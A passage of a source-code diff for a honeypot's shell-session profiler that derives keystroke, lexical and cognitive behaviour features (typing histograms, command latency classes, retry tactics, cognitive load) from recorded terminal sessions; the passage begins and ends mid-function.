) -> int:
    """Sum ``len(data)`` over output events with ``start <= t < end``."""
    total = 0
    for ts, _kind, payload in outputs:
        if start <= ts < end:
            total += len(payload)
    return total
|
||||||
|
|
||||||
|
|
||||||
|
def _typed_char_histograms(
    inputs: list[AsciinemaEvent],
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
    """Build typed-only letter histograms and the Phase G lexical counters.

    Paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``) are
    skipped — pasted text reveals nothing about the operator's keyboard
    or sentiment — and each one resets every running counter. Letter
    bigrams chain only across consecutive ASCII letters; a digit or
    punctuation character breaks the chain. Letters are case-folded
    before counting.

    Lexical counters (G.0): a word buffer of at most ``LEXEME_MAX_LEN``
    case-folded ASCII letters is kept. At every non-letter boundary,
    paste boundary, and end of input, the suffixes of the buffer are
    tested from longest to shortest against ``OBSCENITY_LEXEMES``,
    ``POSITIVE_LEXEMES`` and ``NEGATIVE_LEXEMES`` (in that order for
    each length). The first match scores exactly one hit, so
    ``fucking`` counts once rather than as ``fuck`` + ``fucking``.
    Uppercase runs and ``!`` runs are tracked in the same walk.

    If more than ``LAYOUT_BIGRAM_TOP_N`` distinct bigrams were seen,
    only the ``LAYOUT_BIGRAM_TOP_N`` most frequent are returned.

    Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
    """
    letter_counts: dict[str, int] = {}
    pair_counts: dict[str, int] = {}
    n_letters = 0
    prev_letter: str | None = None

    tail: list[str] = []  # lowercase letters of the word in progress
    hits = [0, 0, 0]      # obscenity, positive, negative
    caps_now = caps_best = 0
    bang_now = bang_best = 0

    def _score_and_reset() -> None:
        """Credit the longest lexicon suffix of the pending word, then drop it."""
        word = "".join(tail)
        tail.clear()
        for size in range(min(len(word), LEXEME_MAX_LEN), 0, -1):
            candidate = word[-size:]
            if candidate in OBSCENITY_LEXEMES:
                hits[0] += 1
                return
            if candidate in POSITIVE_LEXEMES:
                hits[1] += 1
                return
            if candidate in NEGATIVE_LEXEMES:
                hits[2] += 1
                return

    for _ts, _kind, data in inputs:
        if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
            # Paste boundary: break the bigram chain, score the pending
            # word, and restart both run counters.
            prev_letter = None
            _score_and_reset()
            caps_now = bang_now = 0
            continue

        for ch in data:
            ascii_ch = ch.isascii()

            # Uppercase-run tracking.
            caps_now = (caps_now + 1) if (ascii_ch and ch.isupper()) else 0
            caps_best = max(caps_best, caps_now)

            # Exclamation-run tracking.
            bang_now = (bang_now + 1) if ch == "!" else 0
            bang_best = max(bang_best, bang_now)

            if not (ascii_ch and ch.isalpha()):
                # Word boundary.
                prev_letter = None
                _score_and_reset()
                continue

            low = ch.lower()
            letter_counts[low] = letter_counts.get(low, 0) + 1
            n_letters += 1
            if prev_letter is not None:
                pair = prev_letter + low
                pair_counts[pair] = pair_counts.get(pair, 0) + 1
            prev_letter = low
            tail.append(low)
            if len(tail) > LEXEME_MAX_LEN:
                # Slide the window — only the tail can match a lexeme.
                del tail[:-LEXEME_MAX_LEN]

    # Trailing word with no boundary after it.
    _score_and_reset()

    if len(pair_counts) > LAYOUT_BIGRAM_TOP_N:
        ranked = sorted(pair_counts.items(), key=lambda kv: -kv[1])
        pair_counts = dict(ranked[:LAYOUT_BIGRAM_TOP_N])

    obscenity, positive, negative = hits
    return letter_counts, pair_counts, n_letters, _LexCounters(
        obscenity_hits=obscenity,
        positive_lex_hits=positive,
        negative_lex_hits=negative,
        caps_run_max=caps_best,
        bang_run_max=bang_best,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def _output_window(
    outputs: list[AsciinemaEvent],
    start: float,
    end: float,
) -> tuple[int, bool, tuple[PromptLine, ...]]:
    """Summarise the output events timestamped inside ``[start, end)``.

    Returns ``(byte_count, errored, prompt_lines)``:

    * ``byte_count`` — sum of ``len()`` over the payloads that fall in
      the window, measured before ANSI stripping.
    * ``errored`` — result of ``detect_error_in_output`` over the
      ANSI-stripped concatenation of those payloads.
    * ``prompt_lines`` — tuple of whatever ``extract_prompt_lines``
      yields for the same stripped text, timestamped from the last
      in-window event and capped at ``PROMPT_LINE_MAX_CHARS``.

    A window with no events returns ``(0, False, ())`` without calling
    any of the text helpers.

    PII trade-off (Phase F): the stripped text is a local and is not
    returned, but ``prompt_lines`` does carry prompt strings back to
    the caller.
    """
    # One filtered pass; the event kind is ignored because the caller
    # hands in output events only.
    in_window = [(ts, data) for ts, _kind, data in outputs if start <= ts < end]
    if not in_window:
        return 0, False, ()

    byte_count = sum(len(data) for _ts, data in in_window)
    # The last in-window event (in list order) anchors prompt timestamps.
    last_ts = in_window[-1][0]
    stripped = strip_ansi("".join(data for _ts, data in in_window))
    errored = detect_error_in_output(stripped)
    prompts = tuple(
        extract_prompt_lines(
            stripped,
            base_ts=last_ts,
            max_chars=PROMPT_LINE_MAX_CHARS,
        )
    )
    return byte_count, errored, prompts
|
||||||
|
|
||||||
|
|
||||||
|
def build_session_context(
    events: Iterable[AsciinemaEvent],
    *,
    sid: str,
    source: str,
    evidence_ref: str | None = None,
) -> SessionContext:
    """Build the :class:`SessionContext` for ``events``.

    ``events`` is consumed exactly once, so a generator is acceptable.
    Each event is unpacked as ``(timestamp, kind, payload)``; kind
    ``"i"`` goes to the input list, kind ``"o"`` to the output list and
    any other kind only contributes to the session time bounds.

    ``t_start`` is the timestamp of the first event seen and ``t_end``
    the largest timestamp seen; both are ``0.0`` for an empty stream.
    A falsy ``evidence_ref`` is replaced with ``f"session:{sid}"``.
    """
    inputs: list[AsciinemaEvent] = []
    outputs: list[AsciinemaEvent] = []
    t_first: float | None = None
    t_last: float = 0.0

    for event in events:
        ts, kind, _payload = event
        if t_first is None:
            t_first = ts
        t_last = max(t_last, ts)
        if kind == "i":
            inputs.append(event)
        elif kind == "o":
            outputs.append(event)

    t_start, t_end = (0.0, 0.0) if t_first is None else (t_first, t_last)

    # Inter-arrival times between consecutive input events, floored at
    # zero so out-of-order timestamps never produce a negative gap.
    iats: tuple[float, ...] = tuple(
        max(0.0, cur[0] - prev[0]) for prev, cur in zip(inputs, inputs[1:])
    )
    paste_bursts, paste_count = _detect_paste_bursts(inputs)
    typing_bursts = _split_typing_bursts(iats)
    backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
    commands = _segment_commands(inputs)
    commands, prompt_lines = _annotate_commands_with_output(commands, outputs)

    # (end of command i, start of command i + 1) for each adjacent pair;
    # both per-gap series below are derived from the same boundaries.
    gaps = [
        (commands[i].end_ts, commands[i + 1].start_ts)
        for i in range(len(commands) - 1)
    ]
    inter_cmd_iats = tuple(
        max(0.0, next_start - prev_end) for prev_end, next_start in gaps
    )
    output_per_cmd = tuple(
        _output_bytes_between(outputs, prev_end, next_start)
        for prev_end, next_start in gaps
    )
    intra_command_iats = _per_command_iats(commands, inputs)
    typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)

    return SessionContext(
        sid=sid,
        source=source,
        evidence_ref=evidence_ref or f"session:{sid}",
        t_start=t_start,
        t_end=t_end,
        duration_s=max(0.0, t_end - t_start),
        input_events=tuple(inputs),
        output_events=tuple(outputs),
        iats=iats,
        paste_bursts=paste_bursts,
        paste_event_count=paste_count,
        commands=commands,
        inter_cmd_iats=inter_cmd_iats,
        output_per_cmd=output_per_cmd,
        typing_bursts=typing_bursts,
        backspace_count=backspace_count,
        backspace_iats=backspace_iats,
        kill_line_count=kill_line_count,
        intra_command_iats=intra_command_iats,
        prompt_lines=prompt_lines,
        typed_unigram_counts=typed_uni,
        typed_bigram_counts=typed_bi,
        typed_letter_count=typed_letters,
        obscenity_hits=lex.obscenity_hits,
        positive_lex_hits=lex.positive_lex_hits,
        negative_lex_hits=lex.negative_lex_hits,
        caps_run_max=lex.caps_run_max,
        bang_run_max=lex.bang_run_max,
    )
|
||||||
104
decnet/profiler/behave_shell/_features/__init__.py
Normal file
104
decnet/profiler/behave_shell/_features/__init__.py
Normal file
@@ -0,0 +1,104 @@
|
|||||||
|
"""Registered feature functions.
|
||||||
|
|
||||||
|
Each entry takes a ``SessionContext`` and yields zero or more
|
||||||
|
``Observation`` instances. Adding a primitive = adding a function in a
|
||||||
|
sibling module and appending it to ``FEATURES``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Callable, Iterable
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
from decnet.profiler.behave_shell._features.cognitive import (
|
||||||
|
cognitive_load,
|
||||||
|
command_branch_diversity,
|
||||||
|
error_resilience_fallback_to_man,
|
||||||
|
error_resilience_frustration_typing,
|
||||||
|
error_resilience_retry_tactic,
|
||||||
|
exploration_style,
|
||||||
|
feedback_loop_engagement,
|
||||||
|
planning_depth,
|
||||||
|
tool_vocabulary,
|
||||||
|
inter_command_consistency,
|
||||||
|
inter_command_latency_class,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.emotional_valence import (
|
||||||
|
arousal,
|
||||||
|
frustration_venting,
|
||||||
|
stress_response,
|
||||||
|
valence,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.environmental import (
|
||||||
|
keyboard_layout,
|
||||||
|
locale,
|
||||||
|
numpad_usage,
|
||||||
|
shell_type,
|
||||||
|
terminal_multiplexer,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.operational import (
|
||||||
|
cleanup_behavior,
|
||||||
|
multi_actor_indicators,
|
||||||
|
objective,
|
||||||
|
opsec_discipline,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.temporal import (
|
||||||
|
escalation_pattern,
|
||||||
|
exit_behavior,
|
||||||
|
landing_ritual,
|
||||||
|
session_duration,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.motor import (
|
||||||
|
command_chunking,
|
||||||
|
error_correction,
|
||||||
|
input_modality,
|
||||||
|
keystroke_cadence,
|
||||||
|
motor_stability,
|
||||||
|
paste_burst_rate,
|
||||||
|
pipe_chaining_depth,
|
||||||
|
shortcut_usage,
|
||||||
|
tab_completion,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Signature shared by every registered feature function: it receives the
# per-session context and returns an iterable of observations.
FeatureFn = Callable[[SessionContext], Iterable[Observation]]

# Registry of feature functions. The group comments name the sibling
# module each entry is imported from.
FEATURES: tuple[FeatureFn, ...] = (
    # motor
    input_modality,
    paste_burst_rate,
    keystroke_cadence,
    motor_stability,
    error_correction,
    command_chunking,
    tab_completion,
    shortcut_usage,
    pipe_chaining_depth,
    # cognitive
    inter_command_latency_class,
    command_branch_diversity,
    feedback_loop_engagement,
    inter_command_consistency,
    cognitive_load,
    exploration_style,
    planning_depth,
    tool_vocabulary,
    error_resilience_retry_tactic,
    error_resilience_frustration_typing,
    error_resilience_fallback_to_man,
    # temporal
    session_duration,
    escalation_pattern,
    landing_ritual,
    exit_behavior,
    # environmental
    shell_type,
    terminal_multiplexer,
    locale,
    keyboard_layout,
    numpad_usage,
    # operational
    objective,
    opsec_discipline,
    cleanup_behavior,
    multi_actor_indicators,
    # emotional_valence
    valence,
    arousal,
    stress_response,
    frustration_venting,
)
|
||||||
32
decnet/profiler/behave_shell/_features/_emit.py
Normal file
32
decnet/profiler/behave_shell/_features/_emit.py
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
"""Helper for building registry-valid :class:`Observation` records.
|
||||||
|
|
||||||
|
Every feature module would otherwise repeat the same Window /
|
||||||
|
source / evidence_ref boilerplate. This helper centralises it and is
|
||||||
|
the one place to reach when emission semantics change (e.g. when we
|
||||||
|
start parametrising windows on a per-primitive basis).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation, Window
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
|
||||||
|
|
||||||
|
def make_observation(
    ctx: SessionContext,
    *,
    primitive: str,
    value: Any,
    confidence: float,
) -> Observation:
    """Wrap ``value`` in an :class:`Observation` spanning the whole session.

    The window runs from ``ctx.t_start`` to ``ctx.t_end``; ``source``
    and ``evidence_ref`` are copied from ``ctx``. ``primitive``,
    ``value`` and ``confidence`` are passed through unchanged.
    """
    session_window = Window(start_ts=ctx.t_start, end_ts=ctx.t_end)
    return Observation(
        primitive=primitive,
        value=value,
        confidence=confidence,
        window=session_window,
        source=ctx.source,
        evidence_ref=ctx.evidence_ref,
    )
|
||||||
593
decnet/profiler/behave_shell/_features/cognitive.py
Normal file
593
decnet/profiler/behave_shell/_features/cognitive.py
Normal file
@@ -0,0 +1,593 @@
|
|||||||
|
"""``cognitive.*`` feature functions.
|
||||||
|
|
||||||
|
Step 5: ``cognitive.inter_command_latency_class``.
|
||||||
|
Step 6: ``cognitive.command_branch_diversity``.
|
||||||
|
Step 7: ``cognitive.feedback_loop_engagement``.
|
||||||
|
Step 8: ``cognitive.inter_command_consistency``.
|
||||||
|
Step D.1: ``cognitive.cognitive_load``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import statistics
|
||||||
|
from typing import Iterator
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||||
|
from decnet.profiler.behave_shell._parse import hash_token
|
||||||
|
from decnet.profiler.behave_shell._thresholds import (
|
||||||
|
BRANCH_DIVERSITY_LINEAR_MIN,
|
||||||
|
COGNITIVE_LOAD_CHUNKING_REF_CV,
|
||||||
|
COGNITIVE_LOAD_LOW_MAX,
|
||||||
|
COGNITIVE_LOAD_MEDIUM_MAX,
|
||||||
|
COGNITIVE_LOAD_PACE_REF_CV,
|
||||||
|
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
|
||||||
|
EXPLORATION_TARGETED_REP_MIN,
|
||||||
|
FEEDBACK_CORRELATION_MIN,
|
||||||
|
FEEDBACK_MIN_PAIRS,
|
||||||
|
FRUSTRATION_LOW_MAX,
|
||||||
|
FRUSTRATION_MODERATE_MAX,
|
||||||
|
IKI_THINK_MAX_S,
|
||||||
|
INTER_CMD_DELIBERATE_MAX,
|
||||||
|
INTER_CMD_INSTANT_MAX,
|
||||||
|
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
|
||||||
|
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
|
||||||
|
INTER_CMD_TYPING_MAX,
|
||||||
|
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
|
||||||
|
PAUSE_CV_BIMODAL_MIN,
|
||||||
|
PAUSE_CV_METRONOMIC_MAX,
|
||||||
|
PLANNING_DEEP_MIN,
|
||||||
|
PLANNING_REACTIVE_MIN,
|
||||||
|
TOOL_VOCAB_BROAD_MIN,
|
||||||
|
TOOL_VOCAB_NARROW_MAX,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Hashes of the help-family commands (``man`` / ``help`` / ``info``),
# precomputed at import time so the per-session hot loop is a set
# membership check, not 3 sha256 ops per command. The ``--help`` /
# ``-h`` flag forms can't be detected here — they're not first tokens
# (PII discipline keeps only the *first* token's hash). v0.2 will
# reconsider once corpus calibration justifies storing arg-token
# hashes too.
_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
    hash_token("man"),
    hash_token("help"),
    hash_token("info"),
})
|
||||||
|
|
||||||
|
|
||||||
|
def _clip01(x: float) -> float:
    """Clamp ``x`` to ``[0.0, 1.0]``; in-range values are returned as-is."""
    return 0.0 if x < 0.0 else (1.0 if x > 1.0 else x)
|
||||||
|
|
||||||
|
|
||||||
|
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
    """Return the coefficient of variation (sample stdev / mean) of ``xs``.

    Returns ``None`` when the ratio is undefined: fewer than two
    samples, or a mean that is zero or negative.
    """
    if len(xs) < 2:
        return None
    center = statistics.fmean(xs)
    return None if center <= 0.0 else statistics.stdev(xs) / center
|
||||||
|
|
||||||
|
|
||||||
|
def _bucket_inter_cmd_latency(median_iat: float) -> str:
    """Map a median inter-command pause to its latency-class label.

    The ceilings are tested in the order listed and each is inclusive;
    a value above every ceiling is labelled ``"long"``.
    """
    ladder = (
        (INTER_CMD_INSTANT_MAX, "instant"),
        (INTER_CMD_TYPING_MAX, "typing_speed"),
        (INTER_CMD_DELIBERATE_MAX, "deliberate"),
        (INTER_CMD_LLM_LIGHTWEIGHT_MAX, "llm_lightweight"),
        (INTER_CMD_LLM_HEAVYWEIGHT_MAX, "llm_heavyweight"),
    )
    for ceiling, label in ladder:
        if median_iat <= ceiling:
            return label
    return "long"
|
||||||
|
|
||||||
|
|
||||||
|
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_latency_class``.

    Buckets the median of ``ctx.inter_cmd_iats`` (the operator's pause
    between commands) with :func:`_bucket_inter_cmd_latency`. Nothing
    is emitted when the session has no inter-command pauses.
    Confidence is 0.80, dropped to 0.40 when the session has fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
    """
    gaps = ctx.inter_cmd_iats
    if not gaps:
        return
    label = _bucket_inter_cmd_latency(statistics.median(gaps))
    # Sample-size honesty: a short session halves the confidence.
    well_sampled = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_latency_class",
        value=label,
        confidence=0.80 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.command_branch_diversity``.

    A content-only discriminator (no timing): the ratio of distinct
    ``first_token_hash`` values to total commands.

    * no commands — nothing is emitted;
    * fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands —
      ``"unknown"`` at confidence 1.0 (too little data is itself a
      certain answer);
    * ratio at or above ``BRANCH_DIVERSITY_LINEAR_MIN`` —
      ``"linear_playbook"``;
    * otherwise — ``"adaptive_branching"`` (the operator is reusing
      tools).
    """
    primitive = "cognitive.command_branch_diversity"
    commands = ctx.commands
    total = len(commands)
    if total == 0:
        return
    if total < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        yield make_observation(
            ctx, primitive=primitive, value="unknown", confidence=1.0,
        )
        return

    distinct_tools = {cmd.first_token_hash for cmd in commands}
    is_linear = len(distinct_tools) / total >= BRANCH_DIVERSITY_LINEAR_MIN
    yield make_observation(
        ctx,
        primitive=primitive,
        value="linear_playbook" if is_linear else "adaptive_branching",
        confidence=0.80,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.feedback_loop_engagement``.

    Computes the Pearson correlation between ``output_per_cmd[i]``
    (output size seen before the next command) and
    ``inter_cmd_iats[i]`` (the pause that followed). A correlation
    above ``FEEDBACK_CORRELATION_MIN`` is ``"closed_loop"``; anything
    else is ``"fire_and_forget"``.

    ``"unknown"`` at confidence 1.0 is emitted when no honest
    correlation exists: the session has no output events, fewer than
    ``FEEDBACK_MIN_PAIRS`` pairs, or ``statistics.correlation`` raises
    ``StatisticsError``. With no commands at all, nothing is emitted.
    """
    primitive = "cognitive.feedback_loop_engagement"
    samples = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))

    if not ctx.output_events or len(samples) < FEEDBACK_MIN_PAIRS:
        if ctx.commands:
            yield make_observation(
                ctx, primitive=primitive, value="unknown", confidence=1.0,
            )
        return

    seen = [float(sample[0]) for sample in samples]
    pauses = [float(sample[1]) for sample in samples]
    try:
        r = statistics.correlation(seen, pauses)
    except statistics.StatisticsError:
        # Constant series on either axis — correlation undefined.
        yield make_observation(
            ctx, primitive=primitive, value="unknown", confidence=1.0,
        )
        return

    yield make_observation(
        ctx,
        primitive=primitive,
        value="closed_loop" if r > FEEDBACK_CORRELATION_MIN else "fire_and_forget",
        confidence=0.75,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.fallback_to_man``.

    ``"present"`` when at least one errored command is immediately
    followed by a command whose ``first_token_hash`` is in
    ``_HELP_FAMILY_HASHES`` (``man`` / ``help`` / ``info``); otherwise
    ``"absent"``. An errored command that is last in the session has
    no follow-up and cannot trigger the fallback.

    Nothing is emitted when no command errored. Confidence is 0.65,
    or 0.40 when fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE``
    commands errored.

    Only first tokens are compared, so ``--help`` / ``-h`` flag forms
    never fire this primitive.
    """
    commands = ctx.commands
    errored_positions = [idx for idx, cmd in enumerate(commands) if cmd.errored]
    if not errored_positions:
        return

    final_index = len(commands) - 1
    reached_for_help = any(
        commands[idx + 1].first_token_hash in _HELP_FAMILY_HASHES
        for idx in errored_positions
        if idx < final_index
    )

    well_sampled = len(errored_positions) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.fallback_to_man",
        value="present" if reached_for_help else "absent",
        confidence=0.65 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.frustration_typing``.

    Each command after the first contributes the median of its own
    within-command IATs to one of two groups, chosen by whether the
    *preceding* command errored. The relative gap between the two
    group medians, ``abs(err - ok) / ok``, is bucketed into ``"low"`` /
    ``"moderate"`` / ``"high"`` with ``FRUSTRATION_LOW_MAX`` and
    ``FRUSTRATION_MODERATE_MAX``. The gap is unsigned: a speed-up and
    a slowdown after failure count alike.

    Nothing is emitted when there are fewer than two commands, when
    ``intra_command_iats`` does not line up with ``commands``, when
    either group is empty, or when the post-success median is not
    positive. Confidence is 0.60, or 0.40 when the post-error group
    has fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` samples.
    """
    commands = ctx.commands
    per_cmd_iats = ctx.intra_command_iats
    if len(commands) < 2 or len(per_cmd_iats) != len(commands):
        return

    after_error: list[float] = []
    after_success: list[float] = []
    for idx in range(1, len(commands)):
        gaps = per_cmd_iats[idx]
        if gaps:
            group = after_error if commands[idx - 1].errored else after_success
            group.append(statistics.median(gaps))

    if not (after_error and after_success):
        return
    baseline = statistics.median(after_success)
    if baseline <= 0.0:
        return
    shift = abs(statistics.median(after_error) - baseline) / baseline

    if shift < FRUSTRATION_LOW_MAX:
        value = "low"
    elif shift < FRUSTRATION_MODERATE_MAX:
        value = "moderate"
    else:
        value = "high"

    well_sampled = len(after_error) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.frustration_typing",
        value=value,
        confidence=0.60 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.retry_tactic``.

    Every errored command is classified by the command that follows:

    * **rerun** — the next command has the same ``first_token_hash``;
    * **switch** — the next command has a different one;
    * **abort** — there is no next command.

    The emitted value is the most frequent class, with ties resolved
    in the order rerun > switch > abort. ``modify`` is never emitted:
    only the first-token hash is compared, so an edited retry of the
    same tool is counted as a rerun.

    Nothing is emitted when no command errored. Confidence is 0.65,
    or 0.40 when fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE``
    commands errored.
    """
    commands = ctx.commands
    # Insertion order doubles as the tie-break priority: ``max`` returns
    # the first key that reaches the top count.
    tally = {"rerun": 0, "switch": 0, "abort": 0}
    error_total = 0
    for idx, cmd in enumerate(commands):
        if not cmd.errored:
            continue
        error_total += 1
        if idx + 1 >= len(commands):
            tactic = "abort"
        elif commands[idx + 1].first_token_hash == cmd.first_token_hash:
            tactic = "rerun"
        else:
            tactic = "switch"
        tally[tactic] += 1

    if error_total == 0:
        return

    well_sampled = error_total >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.retry_tactic",
        value=max(tally, key=tally.get),
        confidence=0.65 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.

    Classifies the absolute number of distinct ``first_token_hash``
    values: at most ``TOOL_VOCAB_NARROW_MAX`` is ``"narrow"``, at least
    ``TOOL_VOCAB_BROAD_MIN`` is ``"broad"``, anything between is
    ``"moderate"``.

    Nothing is emitted for a session without commands. Short sessions
    (fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands) still
    emit, at confidence 0.40 instead of 0.70.
    """
    commands = ctx.commands
    if not commands:
        return

    vocab_size = len({cmd.first_token_hash for cmd in commands})
    if vocab_size <= TOOL_VOCAB_NARROW_MAX:
        value = "narrow"
    elif vocab_size >= TOOL_VOCAB_BROAD_MIN:
        value = "broad"
    else:
        value = "moderate"

    well_sampled = len(commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.tool_vocabulary",
        value=value,
        confidence=0.70 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.

    Looks at what share of the inter-command pauses fall in each tail:

    * **deep** — the share of pauses longer than ``IKI_THINK_MAX_S``
      reaches ``PLANNING_DEEP_MIN``;
    * **reactive** — otherwise, the share of pauses at or below
      ``INTER_CMD_INSTANT_MAX`` reaches ``PLANNING_REACTIVE_MIN``;
    * **shallow** — neither.

    The deep test runs first, so it wins if both shares qualify.
    Nothing is emitted when there are no inter-command pauses.
    Confidence is 0.65, or 0.40 below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
    """
    gaps = ctx.inter_cmd_iats
    if not gaps:
        return

    total = len(gaps)
    think_share = sum(gap > IKI_THINK_MAX_S for gap in gaps) / total
    instant_share = sum(gap <= INTER_CMD_INSTANT_MAX for gap in gaps) / total

    if think_share >= PLANNING_DEEP_MIN:
        value = "deep"
    elif instant_share >= PLANNING_REACTIVE_MIN:
        value = "reactive"
    else:
        value = "shallow"

    well_sampled = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.planning_depth",
        value=value,
        confidence=0.65 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.

    Two rates are computed over the ``first_token_hash`` sequence:

    * *repetition rate* — ``1 - distinct / total``;
    * *backtrack rate* — share of transitions that land on a tool used
      earlier in the session but different from the immediately
      preceding one (a non-local jump; repeating the predecessor is
      not a backtrack).

    Classification, in test order:

    * **chaotic** — backtrack rate ≥ ``EXPLORATION_CHAOTIC_BACKTRACK_MIN``;
    * **targeted** — repetition rate ≥ ``EXPLORATION_TARGETED_REP_MIN``;
    * **methodical** — neither.

    Nothing is emitted for a session without commands. Short sessions
    still emit, at confidence 0.40 instead of 0.60.
    """
    tools = [cmd.first_token_hash for cmd in ctx.commands]
    total = len(tools)
    if total == 0:
        return

    repetition_rate = 1.0 - (len(set(tools)) / total)

    visited: set[str] = {tools[0]}
    jumps = 0
    for previous, current in zip(tools, tools[1:]):
        if current != previous and current in visited:
            jumps += 1
        visited.add(current)
    steps = total - 1
    backtrack_rate = (jumps / steps) if steps else 0.0

    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
        value = "chaotic"
    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
        value = "targeted"
    else:
        value = "methodical"

    well_sampled = total >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.exploration_style",
        value=value,
        confidence=0.60 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.

    The load score is the mean of up to three sub-signals, each
    clipped to ``[0, 1]``:

    * **chunking** — median of the per-command CVs of intra-command
      IATs, divided by ``COGNITIVE_LOAD_CHUNKING_REF_CV``;
    * **errors** — fraction of commands flagged ``errored``;
    * **pace variability** — CV of the inter-command IATs, divided by
      ``COGNITIVE_LOAD_PACE_REF_CV``.

    A sub-signal whose CV is undefined is left out and the mean is
    taken over the remaining ones, so missing data neither raises nor
    lowers the score. The error fraction is always available.

    The score is bucketed with ``COGNITIVE_LOAD_LOW_MAX`` and
    ``COGNITIVE_LOAD_MEDIUM_MAX``. Nothing is emitted for a session
    without commands. Confidence is 0.60, or 0.40 below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
    """
    commands = ctx.commands
    if not commands:
        return

    signals: list[float] = []

    # Component A: chunking variance — median within-command CV.
    cmd_cvs = [cv for cv in map(_cv, ctx.intra_command_iats) if cv is not None]
    if cmd_cvs:
        signals.append(
            _clip01(statistics.median(cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV)
        )

    # Component B: error rate.
    failed = sum(1 for cmd in commands if cmd.errored)
    signals.append(_clip01(failed / len(commands)))

    # Component C: pace variability — CV of inter-command IATs.
    pace_cv = _cv(ctx.inter_cmd_iats)
    if pace_cv is not None:
